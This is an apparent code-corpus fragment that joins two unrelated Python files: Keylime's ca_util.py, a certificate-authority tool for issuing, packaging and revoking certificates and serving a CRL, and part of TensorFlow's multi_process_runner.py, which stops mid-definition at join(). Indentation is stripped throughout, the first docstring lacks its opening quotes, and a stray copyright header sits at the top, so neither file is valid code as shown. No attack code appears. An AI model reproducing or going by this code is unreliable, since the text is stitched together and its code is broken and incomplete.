Copyright 2017 Massachusetts Institute of Technology.
Tools for creating a CA cert and signed server certs.
Divined from http://svn.osafoundation.org/m2crypto/trunk/tests/test_x509.py
The mk_temporary_xxx calls return a NamedTemporaryFile with certs.
Usage:
# Create a temporary CA cert and its private key
cacert, cakey = mk_temporary_cacert()
# Create a temporary server cert+key, signed by the CA
server_cert = mk_temporary_cert(cacert.name, cakey.name, '*.server.co.uk')
protips
# openssl verify -CAfile cacert.crt cacert.crt cert.crt
# openssl x509 -in cert.crt -noout -text
# openssl x509 -in cacert.crt -noout -text
'''
import sys
import os
import base64
import argparse
import datetime
import getpass
import glob
import zipfile
import io
import socket
import threading
from http.server import HTTPServer, BaseHTTPRequestHandler
from socketserver import ThreadingMixIn
import time
import yaml
try:
from yaml import CSafeLoader as SafeLoader, CSafeDumper as SafeDumper
except ImportError:
from yaml import SafeLoader, SafeDumper
from cryptography import exceptions as crypto_exceptions
from cryptography import x509
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import padding
from keylime import cmd_exec
from keylime import config
from keylime import crypto
from keylime import fs_util
from keylime import json
from keylime import revocation_notifier
from keylime import keylime_logging
logger = keylime_logging.init_logging('ca-util')
if config.CA_IMPL == 'cfssl':
from keylime import ca_impl_cfssl as ca_impl
elif config.CA_IMPL == 'openssl':
from keylime import ca_impl_openssl as ca_impl
else:
raise Exception(f"Unknown CA implementation: {config.CA_IMPL}")
global_password = None
def load_cert_by_path(cert_path):
cert = None
with open(cert_path, 'rb') as ca_file:
cert = x509.load_pem_x509_certificate(
data=ca_file.read(),
backend=default_backend(),
)
return cert
def setpassword(pw):
global global_password
if len(pw) == 0:
raise Exception("You must specify a password!")
global_password = pw
def cmd_mkcert(workingdir, name):
cwd = os.getcwd()
try:
fs_util.ch_dir(workingdir)
priv = read_private()
cacert = load_cert_by_path('cacert.crt')
ca_pk = serialization.load_pem_private_key(
priv[0]['ca'],
password=None,
backend=default_backend()
)
cert, pk = ca_impl.mk_signed_cert(
cacert, ca_pk, name, priv[0]['lastserial'] + 1)
with open(f'{name}-cert.crt', 'wb') as f:
f.write(cert.public_bytes(serialization.Encoding.PEM))
priv[0][name] = pk.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.PKCS8,
encryption_algorithm=serialization.NoEncryption(),
)
# increment serial number after successful creation
priv[0]['lastserial'] += 1
write_private(priv)
with os.fdopen(os.open(f"{name}-private.pem", os.O_WRONLY | os.O_CREAT, 0o600), 'wb') as f:
f.write(priv[0][name])
with os.fdopen(os.open(f"{name}-public.pem", os.O_WRONLY | os.O_CREAT, 0o600), 'wb') as f:
f.write(pk.public_key().public_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PublicFormat.SubjectPublicKeyInfo
))
cc = load_cert_by_path(f'{name}-cert.crt')
pubkey = cacert.public_key()
pubkey.verify(
cc.signature,
cc.tbs_certificate_bytes,
padding.PKCS1v15(),
cc.signature_hash_algorithm,
)
logger.info("Created certificate for name %s successfully in %s", name, workingdir)
except crypto_exceptions.InvalidSignature:
logger.error("ERROR: Cert does not validate against CA")
finally:
os.chdir(cwd)
def cmd_init(workingdir):
cwd = os.getcwd()
try:
fs_util.ch_dir(workingdir)
rmfiles("*.pem")
rmfiles("*.crt")
rmfiles("*.zip")
rmfiles("*.der")
rmfiles("private.yml")
cacert, ca_pk, _ = ca_impl.mk_cacert() # pylint: disable=W0632
priv = read_private()
# write out keys
with open('cacert.crt', 'wb') as f:
f.write(cacert.public_bytes(serialization.Encoding.PEM))
priv[0]['ca'] = ca_pk.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.PKCS8,
encryption_algorithm=serialization.NoEncryption(),
)
# store the last serial number created.
# the CA is always serial # 1
priv[0]['lastserial'] = 1
write_private(priv)
with os.fdopen(os.open("ca-public.pem", os.O_WRONLY | os.O_CREAT, 0o600), 'wb') as f:
f.write(ca_pk.public_key().public_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PublicFormat.SubjectPublicKeyInfo
))
# generate an empty crl
cacert_str = cacert.public_bytes(serialization.Encoding.PEM).decode()
crl = ca_impl.gencrl([], cacert_str, priv[0]['ca'].decode())
if isinstance(crl, str):
crl = crl.encode('utf-8')
with open('cacrl.der', 'wb') as f:
f.write(crl)
convert_crl_to_pem("cacrl.der", "cacrl.pem")
# Sanity checks...
cac = load_cert_by_path('cacert.crt')
pubkey = cacert.public_key()
pubkey.verify(
cac.signature,
cac.tbs_certificate_bytes,
padding.PKCS1v15(),
cac.signature_hash_algorithm,
)
logger.info("CA certificate created successfully in %s", workingdir)
except crypto_exceptions.InvalidSignature:
logger.error("ERROR: Cert does not self validate")
finally:
os.chdir(cwd)
def cmd_certpkg(workingdir, name, insecure=False):
cwd = os.getcwd()
try:
fs_util.ch_dir(workingdir)
# zip up the crt, private key, and public key
with open('cacert.crt', 'rb') as f:
cacert = f.read()
with open(f"{name}-public.pem", 'rb') as f:
pub = f.read()
with open(f"{name}-cert.crt", 'rb') as f:
cert = f.read()
with open('cacrl.der', 'rb') as f:
crl = f.read()
with open('cacrl.pem', 'rb') as f:
crlpem = f.read()
cert_obj = x509.load_pem_x509_certificate(
data=cert,
backend=default_backend(),
)
serial = cert_obj.serial_number
subject = cert_obj.subject.rfc4514_string()
priv = read_private()
private = priv[0][name]
with open(f"{name}-private.pem", 'rb') as f:
prot_priv = f.read()
# no compression to avoid extraction errors in tmpfs
sf = io.BytesIO()
with zipfile.ZipFile(sf, 'w', compression=zipfile.ZIP_STORED) as f:
f.writestr(f"{name}-public.pem", pub)
f.writestr(f"{name}-cert.crt", cert)
f.writestr(f"{name}-private.pem", private)
f.writestr('cacert.crt', cacert)
f.writestr('cacrl.der', crl)
f.writestr('cacrl.pem', crlpem)
pkg = sf.getvalue()
if insecure:
logger.warning(
"Unprotected private keys in cert package being written to disk")
with open(f'{name}-pkg.zip', 'wb') as f:
f.write(pkg)
else:
# actually output the package to disk with a protected private key
with zipfile.ZipFile(f'{name}-pkg.zip', 'w', compression=zipfile.ZIP_STORED) as f:
f.writestr(f"{name}-public.pem", pub)
f.writestr(f"{name}-cert.crt", cert)
f.writestr(f"{name}-private.pem", prot_priv)
f.writestr('cacert.crt', cacert)
f.writestr('cacrl.der', crl)
f.writestr('cacrl.pem', crlpem)
logger.info("Creating cert package for %s in %s-pkg.zip",
name, name)
return pkg, serial, subject
finally:
os.chdir(cwd)
def convert_crl_to_pem(derfile, pemfile):
if config.get('general', 'ca_implementation') == 'openssl':
with open(pemfile, 'w', encoding="utf-8") as f:
f.write("")
else:
cmd = ('openssl', 'crl', '-in', derfile, '-inform', 'der',
'-out', pemfile)
cmd_exec.run(cmd)
def get_crl_distpoint(cert_path):
cert_obj = load_cert_by_path(cert_path)
try:
crl_distpoints = cert_obj.extensions.get_extension_for_class(x509.CRLDistributionPoints).value
for dstpnt in crl_distpoints:
for point in dstpnt.full_name:
if isinstance(point, x509.general_name.UniformResourceIdentifier):
return point.value
except x509.extensions.ExtensionNotFound:
pass
logger.info("No CRL distribution points in %s", cert_path)
return ""
# to check: openssl crl -inform DER -text -noout -in cacrl.der
def cmd_revoke(workingdir, name=None, serial=None):
cwd = os.getcwd()
try:
fs_util.ch_dir(workingdir)
priv = read_private()
if name is not None and serial is not None:
raise Exception(
"You may not specify a cert and a serial at the same time")
if name is None and serial is None:
raise Exception("You must specify a cert or a serial to revoke")
if name is not None:
# load up the cert
cert = load_cert_by_path(f'{name}-cert.crt')
serial = cert.serial_number
# convert serial to string
serial = str(serial)
# get the ca key cert and keys as strings
with open('cacert.crt', encoding="utf-8") as f:
cacert = f.read()
ca_pk = priv[0]['ca'].decode('utf-8')
if serial not in priv[0]['revoked_keys']:
priv[0]['revoked_keys'].append(serial)
crl = ca_impl.gencrl(priv[0]['revoked_keys'], cacert, ca_pk)
write_private(priv)
# write out the CRL to the disk
if os.stat('cacrl.der').st_size:
with open('cacrl.der', 'wb') as f:
f.write(crl)
convert_crl_to_pem("cacrl.der", "cacrl.pem")
finally:
os.chdir(cwd)
return crl
# regenerate the crl without revoking anything
def cmd_regencrl(workingdir):
cwd = os.getcwd()
try:
fs_util.ch_dir(workingdir)
priv = read_private()
# get the ca key cert and keys as strings
with open('cacert.crt', encoding="utf-8") as f:
cacert = f.read()
ca_pk = priv[0]['ca'].decode()
crl = ca_impl.gencrl(priv[0]['revoked_keys'], cacert, ca_pk)
write_private(priv)
# write out the CRL to the disk
with open('cacrl.der', 'wb') as f:
f.write(crl)
convert_crl_to_pem("cacrl.der", "cacrl.pem")
finally:
os.chdir(cwd)
return crl
def cmd_listen(workingdir, cert_path):
cwd = os.getcwd()
try:
fs_util.ch_dir(workingdir)
# just load up the password for later
read_private(True)
serveraddr = ('', config.CRL_PORT)
server = ThreadedCRLServer(serveraddr, CRLHandler)
if os.path.exists('cacrl.der'):
logger.info("Loading existing crl: %s",
os.path.abspath("cacrl.der"))
with open('cacrl.der', 'rb') as f:
server.setcrl(f.read())
t = threading.Thread(target=server.serve_forever)
logger.info("Hosting CRL on %s:%d",
socket.getfqdn(), config.CRL_PORT)
t.start()
def check_expiration():
logger.info("checking CRL for expiration every hour")
while True: # pylint: disable=R1702
try:
if (os.path.exists('cacrl.der') and
os.stat('cacrl.der').st_size):
cmd = ('openssl', 'crl', '-inform', 'der', '-in',
'cacrl.der', '-text', '-noout')
retout = cmd_exec.run(cmd)['retout']
for line in retout:
line = line.strip()
if line.startswith(b"Next Update:"):
expire = datetime.datetime.strptime(
line[13:].decode('utf-8'), "%b %d %H:%M:%S %Y %Z")
# check expiration within 6 hours
in6hours = datetime.datetime.utcnow() + datetime.timedelta(hours=6)
if expire <= in6hours:
logger.info(
"Certificate to expire soon %s, re-issuing", expire)
cmd_regencrl(workingdir)
# check a little less than every hour
time.sleep(3540)
except KeyboardInterrupt:
logger.info("TERM Signal received, shutting down...")
# server.shutdown()
break
t2 = threading.Thread(target=check_expiration)
t2.daemon = True
t2.start()
def revoke_callback(revocation):
json_meta = json.loads(revocation['meta_data'])
serial = json_meta['cert_serial']
if revocation.get('type', None) != 'revocation' or serial is None:
logger.error("Unsupported revocation message: %s", revocation)
return
logger.info("Revoking certificate: %s", serial)
server.setcrl(cmd_revoke(workingdir, None, serial))
try:
while True:
try:
revocation_notifier.await_notifications(
revoke_callback, revocation_cert_path=cert_path)
except Exception as e:
logger.exception(e)
logger.warning(
"No connection to revocation server, retrying in 10s...")
time.sleep(10)
except KeyboardInterrupt:
logger.info("TERM Signal received, shutting down...")
server.shutdown()
sys.exit()
finally:
os.chdir(cwd)
class ThreadedCRLServer(ThreadingMixIn, HTTPServer):
published_crl = None
def setcrl(self, crl):
self.published_crl = crl
class CRLHandler(BaseHTTPRequestHandler):
def do_GET(self):
logger.info('GET invoked from %s with uri: %s', str(self.client_address), self.path)
if self.server.published_crl is None:
self.send_response(404)
self.end_headers()
else:
# send back the CRL
self.send_response(200)
self.end_headers()
self.wfile.write(self.server.published_crl)
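# Hedged usage note: once cmd_listen() is running, the currently published CRL
# can be fetched from any path on the server (host name and port below are
# illustrative placeholders; the port comes from config.CRL_PORT), e.g.:
#   curl -o cacrl.der http://<ca-host>:<CRL_PORT>/
#   openssl crl -inform DER -text -noout -in cacrl.der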
def rmfiles(path):
files = glob.glob(path)
for f in files:
os.remove(f)
def write_private(inp):
priv = inp[0]
salt = inp[1]
priv_encoded = yaml.dump(priv, Dumper=SafeDumper)
key = crypto.kdf(global_password, salt)
ciphertext = crypto.encrypt(priv_encoded, key)
towrite = {'salt': salt, 'priv': ciphertext}
with os.fdopen(os.open('private.yml', os.O_WRONLY | os.O_CREAT, 0o600), 'w', encoding="utf-8") as f:
yaml.dump(towrite, f, Dumper=SafeDumper)
def read_private(warn=False):
if global_password is None:
setpassword(getpass.getpass(
"Please enter the password to decrypt your keystore: "))
if os.path.exists('private.yml'):
with open('private.yml', encoding="utf-8") as f:
toread = yaml.load(f, Loader=SafeLoader)
key = crypto.kdf(global_password, toread['salt'])
try:
plain = crypto.decrypt(toread['priv'], key)
except ValueError as e:
raise Exception("Invalid password for keystore") from e
return yaml.load(plain, Loader=SafeLoader), toread['salt']
if warn:
# file doesn't exist, just invent a salt
logger.warning("Private certificate data %s does not exist yet.",
os.path.abspath("private.yml"))
logger.warning(
"Keylime will attempt to load private certificate data again when it is needed.")
return {'revoked_keys': []}, base64.b64encode(crypto.generate_random_key()).decode()
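# Keystore layout sketch (as implied by write_private()/read_private() above):
# private.yml stores {'salt': <salt>, 'priv': <ciphertext>}, where the
# plaintext is a YAML dump of a dict such as
#   {'ca': <PEM-encoded CA key>, 'lastserial': N,
#    'revoked_keys': [...], '<name>': <PEM-encoded key>, ...}
# encrypted with a key derived from the interactive password via crypto.kdf().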
def main(argv=sys.argv): #pylint: disable=dangerous-default-value
parser = argparse.ArgumentParser(argv[0])
parser.add_argument('-c', '--command', action='store', dest='command',
required=True, help="valid commands are init,create,pkg,revoke,listen")
parser.add_argument('-n', '--name', action='store',
help='the common name of the certificate to create')
parser.add_argument('-d', '--dir', action='store',
help='use a custom directory to store certificates and keys')
parser.add_argument('-i', '--insecure', action='store_true', default=False,
help='create cert packages with unprotected private keys and write them to disk. USE WITH CAUTION!')
args = parser.parse_args(argv[1:])
if args.dir is None:
if os.getuid() != 0 and config.REQUIRE_ROOT:
logger.error(
"If you don't specify a working directory, this process must be run as root to access %s", config.WORK_DIR)
sys.exit(-1)
workingdir = config.CA_WORK_DIR
else:
workingdir = args.dir
# set a conservative general umask
os.umask(0o077)
if args.command == 'init':
cmd_init(workingdir)
elif args.command == 'create':
if args.name is None:
logger.error(
"you must pass in a name for the certificate using -n (or --name)")
parser.print_help()
sys.exit(-1)
cmd_mkcert(workingdir, args.name)
elif args.command == 'pkg':
if args.name is None:
logger.error(
"you must pass in a name for the certificate using -n (or --name)")
parser.print_help()
sys.exit(-1)
cmd_certpkg(workingdir, args.name, args.insecure)
elif args.command == 'revoke':
if args.name is None:
logger.error(
"you must pass in a name for the certificate using -n (or --name)")
parser.print_help()
sys.exit(-1)
cmd_revoke(workingdir, args.name)
elif args.command == 'listen':
if args.name is None:
args.name = os.path.join(workingdir, 'RevocationNotifier-cert.crt')
logger.warning("using default name for revocation cert %s",
args.name)
cmd_listen(workingdir, args.name)
else:
logger.error("Invalid command: %s", args.command)
parser.print_help()
sys.exit(-1)
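# Hedged usage sketch (not part of the original module): main() parses the
# flags defined above, so it can be driven with an argv-style list. The
# working directory below is illustrative; "create" assumes "init" has been
# run first, and a keystore password is prompted for interactively.
#
#   main(['ca_util', '-c', 'init', '-d', '/tmp/myca'])
#   main(['ca_util', '-c', 'create', '-d', '/tmp/myca', '-n', 'server.example.com'])
#   main(['ca_util', '-c', 'pkg', '-d', '/tmp/myca', '-n', 'server.example.com'])
#   main(['ca_util', '-c', 'listen', '-d', '/tmp/myca'])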
|
multi_process_runner.py
|
# Lint as: python3
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Multi-process runner for testing purpose."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import atexit
import collections
import contextlib
import json
import os
import signal
import sys
import threading
import time
import unittest
import weakref
from absl import logging
import six
from six.moves import queue as Queue
from tensorflow.python import tf2
from tensorflow.python.compat import v2_compat
from tensorflow.python.distribute import multi_process_lib
from tensorflow.python.eager import context
multiprocessing = multi_process_lib.multiprocessing
# pylint: disable=g-import-not-at-top
try:
# `faulthandler` is not available in py2.
import faulthandler
except ImportError:
faulthandler = None
# TODO(b/150264776): Remove after resolving CI issue.
try:
import dill
except ImportError:
dill = None
# TODO(b/150264776): Remove after resolving CI issue.
try:
import tblib.pickling_support
# For pickling traceback objects.
tblib.pickling_support.install()
except ImportError:
pass
# _ProcessStatusInfo contains process status information. When the is_successful
# attribute is True, the subprocess has ended successfully; if False, the
# exception stack trace info is stored in exc_info to be passed on to the
# parent process and re-raised.
_ProcessStatusInfo = collections.namedtuple(
'_ProcessStatusInfo',
['task_type', 'task_id', 'is_successful', 'exc_info', 'return_value'])
# Information returned from a successful MultiProcessRunner run.
MultiProcessRunnerResult = collections.namedtuple('MultiProcessRunnerResult',
['return_value', 'stdout'])
TestEnvironment = collections.namedtuple('TestEnvironment', [
'task_type', 'task_id', 'cluster_spec', 'rpc_layer', 'grpc_fail_fast',
'v2_enabled', 'executing_eagerly'
])
# Resources for communication between worker processes and the main process.
#
# `process_status_queue` is used by `multi_process_runner` internally for
# communication from subprocesses to the parent process for whether it's been
# successful, and if not what the error stack trace is.
# `parent_to_sub_queue` is used for communications from parent to subprocess.
# Currently this is only used to terminate subprocesses.
# TODO(rchao): Remove this once subprocess is terminated by SIGKILL.
# `streaming_pipe_w` is to stream stdout and stderr from subprocesses to parent
# process.
# `barrier` is a barrier for the party of all subprocesses.
Resources = collections.namedtuple('Resources', [
'process_status_queue', 'parent_to_sub_queue', 'streaming_pipe_w', 'barrier'
])
# Default time out sec is selected so that it's handled before the default
# "medium" timeout of the test runs.
_DEFAULT_TIMEOUT_SEC = 200
# The timeout in seconds to wait to force kill a child process. When a child
# process times out we first try to SIGTERM it so that it has a chance to dump
# stacktraces. However dumping stacktrace can take a long time.
_FORCE_KILL_WAIT_SEC = 30
class MultiProcessRunner(object):
"""A utility class to start multiple processes to simulate a cluster.
We need to use multiple processes to simulate a cluster in TF 2.0 tests
because TF 2.0 has some process-global data structures that have to be
separated by processes. We also need child processes to test out our fault
tolerance because shutting down a standard TensorFlow server within its
process is not supported.
Note: the main test program that uses this runner class must run its main
program via `test_main` defined in this file. Using this runner in non-test
binaries is not supported yet.
This class is not thread-safe. Child processes will inherit TF2 behavior flag.
"""
def __init__(self,
proc_func,
cluster_spec,
rpc_layer=None,
max_run_time=None,
grpc_fail_fast=None,
stream_stdout=True,
list_stdout=False,
use_dill_for_args=True,
daemon=False,
dependence_on_chief=True,
auto_restart=False,
args=None,
kwargs=None):
"""Creates a multi-process runner.
Args:
proc_func: Function to be run on child processes. This will be run on
processes for all task types.
cluster_spec: Dict for cluster spec. The following is an example of
cluster with three workers and two ps's.
{"worker": ["worker0.example.com:2222",
"worker1.example.com:2222",
"worker2.example.com:2222"],
"ps": ["ps0.example.com:2222",
"ps1.example.com:2222"]}
rpc_layer: RPC layer to use. Default value is 'grpc'.
max_run_time: If set, child processes are forced to exit at approximately
this many seconds after `start` is called. We achieve this through the
`signal.alarm()` API. Note that this is best effort at the Python level,
since the Python signal handler does not get executed while lower-level
C/C++ code is running, so it can be delayed for an arbitrarily long time.
If any of the child processes are still running when `max_run_time` is up,
they will be force-terminated and an `UnexpectedSubprocessExitError`
may be raised at `join()`.
grpc_fail_fast: Whether GRPC connection between processes should fail
without retrying. Defaults to None, in which case the environment
variable is not explicitly set.
stream_stdout: True if the output/error from the subprocesses should be
streamed to be printed in parent process' log. Defaults to True.
list_stdout: True if the output/error from the subprocesses should be
collected to be attached to the resulting `MultiProcessRunnerResult`
returned from `MultiProcessRunner.join()`. If True, the list of stdout
can be retrieved via `MultiProcessRunnerResult.stdout` attribute.
Defaults to False.
use_dill_for_args: Whether to use dill to pickle `args` and `kwargs`. dill
can pickle more objects, but doesn't work with types in
`multiprocessing` library like `Mutex`.
daemon: Whether to start processes as daemons.
dependence_on_chief: Whether to terminate the cluster if the chief exits.
If auto_restart is True, it only terminates the cluster if the chief
exits with a zero exit code.
auto_restart: Whether to automatically restart processes that exit with
non-zero exit code.
args: Positional arguments to be sent to functions run on processes.
kwargs: Keyword arguments to be sent to functions run on processes.
Raises:
RuntimeError: if `multi_process_runner.test_main()` is not called.
ValueError: if there are more than one chief in the `cluster_spec`.
"""
assert cluster_spec is not None
if 'chief' in cluster_spec and len(cluster_spec['chief']) > 1:
raise ValueError('If chief exists in the cluster, there must be at most '
'one chief. Current `cluster_spec` has {} chiefs.'
.format(len(cluster_spec['chief'])))
if not multi_process_lib.initialized():
raise MultiProcessRunnerNotInitializedError(
'`multi_process_runner` is not initialized. '
'Please call `multi_process_runner.test_main()` '
'within `if __name__ == \'__main__\':` block '
'in your python module to properly initialize '
'`multi_process_runner`.')
if not callable(proc_func):
raise ValueError('proc_func is not a callable')
self._proc_func = proc_func
self._cluster_spec = cluster_spec
self._rpc_layer = rpc_layer or 'grpc'
self._max_run_time = max_run_time
self._grpc_fail_fast = grpc_fail_fast
self._stream_stdout = stream_stdout
# TODO(rchao): Revisit list_stdout argument to consider other solution.
self._list_stdout = list_stdout
self._dependence_on_chief = dependence_on_chief
self._use_dill_for_args = use_dill_for_args
self._daemon = daemon
self._auto_restart = auto_restart
self._args = args or ()
self._kwargs = kwargs or {}
# Child processes should have the same v2 and eager behavior.
self._v2_enabled = tf2.enabled()
self._executing_eagerly = context.executing_eagerly()
self._joined = False
self._process_lock = threading.Lock()
# Guarded by self._process_lock.
self._processes = {}
# Record which processes are terminated. Due to a bug in Python<3.7,
# terminated processes return 255 exit code, which should cause an exception
# in join().
# https://bugs.python.org/issue30589
# Guarded by self._process_lock.
self._terminated = set()
self._reading_threads = []
self._manager = manager()
self._process_status_queue = self._manager.Queue()
self._parent_to_sub_queue = self._manager.Queue()
parties = sum(len(addresses) for addresses in self._cluster_spec.values())
self._barrier = self._manager.Barrier(parties)
# We use a queue to collect outputs from worker processes since it's thread
# safe.
self._streaming_queue = self._manager.Queue()
self._watchdog_thread = None
def set_args(self, args=None, kwargs=None):
self._args = args or self._args
self._kwargs = kwargs or self._kwargs
def _continuously_readline_from_sub(self, pipe_r, task_type, task_id):
"""Function to continuously read lines from subprocesses."""
with os.fdopen(pipe_r.fileno(), 'r', closefd=False) as reader:
for line in reader:
task_string = '[{}-{}]:'.format(task_type, task_id)
formatted_line = '{} {}'.format(task_string.ljust(14), line)
if self._stream_stdout:
# TODO(rchao): Use a lock here to ensure the printed lines are not
# broken.
print(formatted_line, end='', flush=True)
if self._list_stdout:
self._streaming_queue.put(formatted_line)
def _start_subprocess_and_reading_thread(self,
task_type,
task_id,
cluster_spec=None,
proc_func=None,
args=None,
kwargs=None):
"""Start a subprocess and a thread the reads lines from the subprocess."""
if dill is None:
raise unittest.SkipTest(
'TODO(b/150264776): Resolve dependency issue in CI')
test_env = TestEnvironment(
task_type=task_type,
task_id=task_id,
cluster_spec=cluster_spec or self._cluster_spec,
rpc_layer=self._rpc_layer,
grpc_fail_fast=self._grpc_fail_fast,
v2_enabled=self._v2_enabled,
executing_eagerly=self._executing_eagerly,
)
pipe_r, pipe_w = multiprocessing.Pipe(duplex=False)
resources = Resources(
process_status_queue=self._process_status_queue,
parent_to_sub_queue=self._parent_to_sub_queue,
streaming_pipe_w=pipe_w,
barrier=self._barrier,
)
if proc_func is None:
proc_func, args, kwargs = self._proc_func, self._args, self._kwargs
# Always use dill to pickle proc_func so that we support more callable
# types, e.g. lambda.
proc_func = dill.dumps(proc_func, dill.HIGHEST_PROTOCOL)
if self._use_dill_for_args:
args = dill.dumps(args, dill.HIGHEST_PROTOCOL)
kwargs = dill.dumps(kwargs, dill.HIGHEST_PROTOCOL)
p = _Process(
test_env=test_env,
target=_ProcFunc(),
args=(resources, test_env, proc_func, args, kwargs,
self._use_dill_for_args),
daemon=self._daemon)
p.start()
self._processes[(task_type, task_id)] = p
self._terminated.discard((task_type, task_id))
# For each subprocess, we dedicate a thread continuously reading lines
# from them.
thread = threading.Thread( # pylint: disable=unexpected-keyword-arg
target=self._continuously_readline_from_sub,
args=(pipe_r, task_type, task_id))
thread.start()
self._reading_threads.append(thread)
if self._watchdog_thread is None or not self._watchdog_thread.is_alive():
self._watchdog_thread = threading.Thread(target=self._process_watchdog)
self._watchdog_thread.start()
def start(self):
"""Starts processes, one for each task in `cluster_spec`.
Note that this is best effort by the applicable multiprocessing library,
and it may take several seconds for a subprocess to be successfully
started.
"""
with self._process_lock:
if self._processes:
raise ValueError('MultiProcessRunner already started.')
if self._joined:
raise ValueError('cannot start new processes after '
'MultiProcessRunner.join() is called')
for task_type, addresses in self._cluster_spec.items():
for task_id, _ in enumerate(addresses):
self._start_subprocess_and_reading_thread(task_type, task_id)
# TODO(rchao): Remove the need of using SIGALRM if possible. At this time,
# without this the tests become very flaky.
if self._max_run_time is not None:
def handler(signum, frame):
del signum, frame
self.terminate_all()
signal.signal(signal.SIGALRM, handler)
signal.alarm(self._max_run_time)
def start_in_process_as(self, as_task_type, as_task_id):
"""Start the processes, with the specified task run in main process.
This is similar to `start()` except that the task with task_type
`as_task_type` and task_id `as_task_id` is run in the main process.
This method is particularly useful when debugging tool such as `pdb` is
needed in some specific task. Note that since this method is blocking until
that specific task exits, additional actions would need a thread to be
called:
```python
def proc_func():
# user code to be run
import pdb; pdb.set_trace()
def follow_ups():
time.sleep(5)
mpr.start_single_process(
task_type='evaluator',
task_id=0)
mpr = multi_process_runner.MultiProcessRunner(
proc_func,
multi_worker_test_base.create_cluster_spec(
has_chief=True, num_workers=1))
threading.Thread(target=follow_ups).start()
mpr.start_in_process_as(as_task_type='chief', as_task_id=0)
mpr.join()
```
Note that if `list_stdout=True`, the logs/stdout from the task
run by the main process are not available in result.stdout.
Args:
as_task_type: The task type to be run in the main process.
as_task_id: The task id to be run in the main process.
"""
if self._processes:
raise ValueError('MultiProcessRunner already started.')
with self._process_lock:
if self._joined:
raise ValueError('cannot start new processes after '
'MultiProcessRunner.join() is called')
for task_type, addresses in self._cluster_spec.items():
for task_id, _ in enumerate(addresses):
if not (task_type == as_task_type and task_id == as_task_id):
self._start_subprocess_and_reading_thread(task_type, task_id)
_set_tf_config(as_task_type, as_task_id, self._cluster_spec,
self._rpc_layer)
self._proc_func(*self._args, **self._kwargs)
def start_single_process(self,
task_type,
task_id,
cluster_spec=None,
proc_func=None,
args=None,
kwargs=None):
"""Starts a single process.
This starts a process in the cluster with the task type, task id, and the
process function (`proc_func`). If process function is `None`, the function
provided at `__init__` will be used. If `cluster_spec` is `None`, the
cluster spec provided at `__init__` will be used.
TODO(rchao): It is meant that all subprocesses will be updated with the new
cluster spec, but this has yet to be implemented. At this time only the
newly started subprocess picks up this updated cluster spec.
Args:
task_type: The task type.
task_id: The task id.
cluster_spec: The cluster spec to be used on the newly started
process. If `None`, the cluster spec provided at `__init__` will be
used.
proc_func: The process function to be run on the newly started
process. If specified, specify `args` and `kwargs` as well. If `None`,
the function provided at `__init__` will be used.
args: Optional positional arguments to be supplied in `proc_func`.
kwargs: Optional keyword arguments to be supplied in `proc_func`.
"""
with self._process_lock:
if self._joined:
raise ValueError('cannot start new processes after '
'MultiProcessRunner.join() is called')
self._start_subprocess_and_reading_thread(
task_type,
task_id,
cluster_spec=cluster_spec,
proc_func=proc_func,
args=args or (),
kwargs=kwargs or {})
def _queue_to_list(self, queue_to_convert):
"""Convert `queue.Queue` to `list`."""
list_to_return = []
# Calling `queue.empty()` is not reliable.
while True:
try:
list_to_return.append(queue_to_convert.get(block=False))
except Queue.Empty:
break
return list_to_return
def _get_process_statuses(self):
# One worker may have multiple statuses. We only keep the last one.
statuses = {}
for status in self._queue_to_list(self._process_status_queue):
statuses[(status.task_type, status.task_id)] = status
return statuses
def get_process_id(self, task_type, task_id):
"""Returns the subprocess id given the task type and task id."""
with self._process_lock:
p = self._processes.get((task_type, task_id), None)
return p.pid if p else None
def get_process_exit_code(self, task_type, task_id):
"""Returns the subprocess exit code given the task type and task id.
Args:
task_type: The task type.
task_id: The task id.
Returns:
The subprocess exit code; `None` if the subprocess has not exited yet.
Raises:
KeyError: If the corresponding subprocess is not found with `task_type`
and `task_id`.
"""
with self._process_lock:
p = self._processes[(task_type, task_id)]
return p.exitcode if p else None
def process_exists(self, task_type, task_id):
"""Returns whether the subprocess still exists given the task type and id.
Args:
task_type: The task type.
task_id: The task id.
Returns:
Boolean; whether the subprocess still exists. If the subprocess has
exited, this returns False.
"""
return self.get_process_exit_code(task_type, task_id) is None
def _process_watchdog(self):
"""Simulates a cluster management system.
- If auto_restart is True, it restarts processes that exit with a non-zero
exit code. Note that when join() times out it overrides auto_restart to
False.
- If dependence_on_chief is True, it terminates all processes once the chief
exits. If auto_restart is also True, it only terminates all processes if
the chief exits with a zero exit code; otherwise it restarts the chief.
This runs in self._watchdog_thread.
"""
while True:
time.sleep(1)
with self._process_lock:
chief = self._processes.get(('chief', 0), None)
# Terminate the cluster when _dependence_on_chief is True if either:
# - chief has exited with zero exit code.
# - chief has exited with non-zero exit code and self._auto_restart is
# False.
if chief and self._dependence_on_chief and chief.exitcode is not None:
if chief.exitcode == 0 or (not self._auto_restart):
for p in self._processes.values():
# Give other processes a chance to exit on their own.
p.join(timeout=3)
self._terminate_all()
for p in self._processes.values():
p.join()
return
# Auto restart failed processes if self._auto_restart is True.
if self._auto_restart:
has_failure = False
for (task_type, task_id), p in self._processes.items():
if p.exitcode is not None and p.exitcode != 0:
has_failure = True
logging.info('Restarting failed %s-%d', task_type, task_id)
self._start_subprocess_and_reading_thread(task_type, task_id)
if has_failure:
continue
# Exit the thread if all processes have exited at this point.
if all(p.exitcode is not None for p in self._processes.values()):
return
def _reraise_if_subprocess_error(self, process_statuses):
for process_status in process_statuses.values():
assert isinstance(process_status, _ProcessStatusInfo)
if not process_status.is_successful:
process_status.exc_info[1].mpr_result = self._get_mpr_result(
process_statuses)
six.reraise(*process_status.exc_info)
def join(self, timeout=_DEFAULT_TIMEOUT_SEC):
